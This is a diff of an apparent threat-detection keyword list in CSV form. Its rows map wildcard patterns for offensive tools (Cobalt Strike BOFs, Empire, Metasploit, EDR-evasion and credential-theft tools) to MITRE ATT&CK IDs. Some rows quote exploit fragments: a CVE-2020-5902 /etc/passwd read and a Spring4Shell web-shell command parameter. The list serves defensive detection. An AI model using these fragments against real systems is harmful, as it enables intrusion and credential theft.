+"*synacktiv/GPOddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*synacktiv/ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"*synacktiv_gpoddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
 "*sync-starkiller*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
 "*synergy_httpx.py*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z"
 "*Synergy-httpx-main*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z"
 "*syscall_disable_priv *","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z"
 "*syscall_enable_priv *","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z"
-"*syscall_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*syscall_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*syscalls.asm*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z"
 "*syscalls.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z"
 "*syscalls_dump.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
@@ -17513,23 +17696,23 @@
 "*sysmonquiet.*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z"
 "*SysmonQuiet-main*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z"
 "*SySS-Research*","offensive_tool_keyword","Github Username","github repo Open source IT security software tools and information and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SySS-Research","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*SySS-Research/Seth*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
+"*SySS-Research/Seth*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
 "*system rm -f /current/tmp/ftshell.latest*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z"
 "*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/Aomain Admins*","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
 "*SYSTEM\CurrentControlSet\Services\dcrypt*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
-"*System32fileWritePermissions.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*System32fileWritePermissions.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*systemctl start nessusd*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
 "*SysWhispers.git *","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z"
 "*syswhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z"
 "*syswhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z"
-"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
-"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
 "*syswhispers.py*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z"
 "*SysWhispers2*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z"
-"*syswhispersv2_x86*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*syswhispersv2_x86*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
 "*-t * -x lfr -f /etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z"
 "*-t * -x rce -a list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z"
-"*T0XlCv1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*T0XlCv1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*t3l3machus/BabelStrike*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z"
 "*t3l3machus/Synergy-httpx*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z"
 "*TailorScan.exe *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" 
@@ -17553,13 +17736,14 @@
 "*target/tomcatwar.jsp?pwd=j&cmd=*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z"
 "*targetedKerberoast.git*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z"
 "*targetedKerberoast.py*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z"
-"*targetedkerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*targetedkerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*targetedkerberoast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*targetedkerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
